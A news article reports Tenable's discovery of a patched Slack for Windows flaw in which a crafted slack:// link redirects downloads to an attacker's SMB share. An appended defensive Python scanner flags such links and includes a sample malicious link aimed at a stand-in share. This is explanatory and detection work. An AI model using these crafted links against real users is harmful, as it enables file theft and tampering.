Slack patches vulnerability in Windows client that could be used to hijack files

Strangers in your Slack channel could have messed with Slack for Windows' download settings, redirecting files to a malicious shared folder. It's fixed now.

(Image credit: NOAH BERGER/AFP/Getty Images)

On May 17, researchers at Tenable revealed that they had discovered a vulnerability in the Windows version of the desktop application for Slack, the widely used collaboration service. The vulnerability, in Slack Desktop version 3.3.7 for Windows, could have been used to change the destination of a file download from a Slack conversation to a remote file share owned by an attacker. This would allow the attacker not only to steal every file the targeted user downloaded from then on, but potentially to alter those files and add malware to them—so that when the victim opened them, they would get a nasty surprise.

Tenable reported the vulnerability to Slack via HackerOne. Slack has issued an update to the Windows desktop client that closes the vulnerability.

The potential attack used a weakness in the way the "slack://" protocol handler was implemented in the Windows application. By creating a crafted link posted in a Slack channel, the attacker could alter the default settings of the client—changing the download directory, for example, to a new location with a URL such as "slack://settings/?update={'PrefSSBFileDownloadPath':'<pathHere>'}". That path could be directed to a Server Message Block (SMB) file sharing location controlled by the attacker. Once clicked, all future downloads would be dropped onto the attacker's SMB server. This link could be disguised as a Web link—in a proof-of-concept, the malicious Slack attack posed as a link to Google.
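As an added illustration (not code from the article, Tenable, or Slack), here is a defender-side Python check that flags slack://settings links whose update= payload points PrefSSBFileDownloadPath at a UNC share, the redirection described above. The sample messages and share hostnames are constructed, and the set of preference keys is an assumption.

```python
import json
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Preference keys that redirect downloads. Only PrefSSBFileDownloadPath is
# named in the article; using a set is an assumption so it can be extended.
DOWNLOAD_PATH_KEYS = {"PrefSSBFileDownloadPath"}

# Path prefixes that point outside the local machine (UNC / SMB shares).
REMOTE_PATH_RE = re.compile(r"^(\\\\|//)")

# Constructed sample messages (not from the article): a plain web link, a
# settings link pointing downloads at a share, a settings link pointing at
# a local folder, and an unrelated slack:// deep link.
SAMPLE_MESSAGES = [
    "notes from today: https://www.google.com/",
    "slack://settings/?update={'PrefSSBFileDownloadPath':'\\\\\\\\files.example.test\\\\drop'}",
    "slack://settings/?update={'PrefSSBFileDownloadPath':'C:\\\\Users\\\\me\\\\Downloads'}",
    "slack://channel?team=T00000000&id=C00000000",
]


def parse_update_param(query):
    """Decode the update= dict (single-quoted, as in the article) into a Python dict."""
    values = parse_qs(query).get("update")
    if not values:
        return {}
    # Normalise smart quotes (common after copy/paste) before treating it as JSON.
    raw = unquote(values[0]).translate(str.maketrans("\u2018\u2019\u201c\u201d", "''\"\""))
    try:
        return json.loads(raw.replace("'", '"'))
    except ValueError:
        return {}


def inspect_message(text):
    """Return (preference_key, path, remote) for each slack://settings link in a message.

    remote is True when the path is a UNC share, i.e. downloads would leave the host."""
    findings = []
    for match in re.finditer(r"slack://\S+", text):
        parts = urlsplit(match.group(0))
        if parts.netloc.lower() != "settings":
            continue
        for key, value in parse_update_param(parts.query).items():
            if key in DOWNLOAD_PATH_KEYS:
                path = str(value)
                findings.append((key, path, bool(REMOTE_PATH_RE.match(path))))
    return findings


def scan_messages(messages):
    """Map message index -> findings, keeping only messages with a remote download path."""
    alerts = {}
    for i, msg in enumerate(messages):
        remote = [f for f in inspect_message(msg) if f[2]]
        if remote:
            alerts[i] = remote
    return alerts
```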


Source: Ars Technica – Slack patches vulnerability in Windows client that could be used to hijack files